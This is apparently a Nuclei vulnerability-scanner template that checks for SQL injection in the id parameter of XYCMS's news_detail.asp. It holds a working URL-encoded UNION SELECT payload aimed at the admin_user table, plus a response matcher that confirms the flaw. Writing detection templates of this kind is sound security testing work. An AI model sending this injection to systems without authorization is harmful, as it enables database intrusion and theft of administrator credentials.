id: XYCMS-news-sqli

info:
  name: XYCMS系统news_detail.asp文件id参数SQL注入
  author: str1am
  severity: high
  tags: XYCMS,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/news_detail.asp?id=-8301%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CHR(113)%26CHR(120)%26CHR(98)%26CHR(122)%26CHR(113)%26CHR(105)%26CHR(82)%26CHR(102)%26CHR(74)%26CHR(82)%26CHR(65)%26CHR(121)%26CHR(121)%26CHR(115)%26CHR(112)%26CHR(87)%26CHR(104)%26CHR(87)%26CHR(89)%26CHR(112)%26CHR(106)%26CHR(72)%26CHR(107)%26CHR(113)%26CHR(116)%26CHR(90)%26CHR(102)%26CHR(114)%26CHR(86)%26CHR(66)%26CHR(85)%26CHR(103)%26CHR(90)%26CHR(66)%26CHR(75)%26CHR(78)%26CHR(70)%26CHR(78)%26CHR(118)%26CHR(115)%26CHR(99)%26CHR(67)%26CHR(121)%26CHR(114)%26CHR(116)%26CHR(113)%26CHR(122)%26CHR(98)%26CHR(120)%26CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20admin_user%16"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "KNFNvscCyrtqzbxq"
        part: body
        condition: and
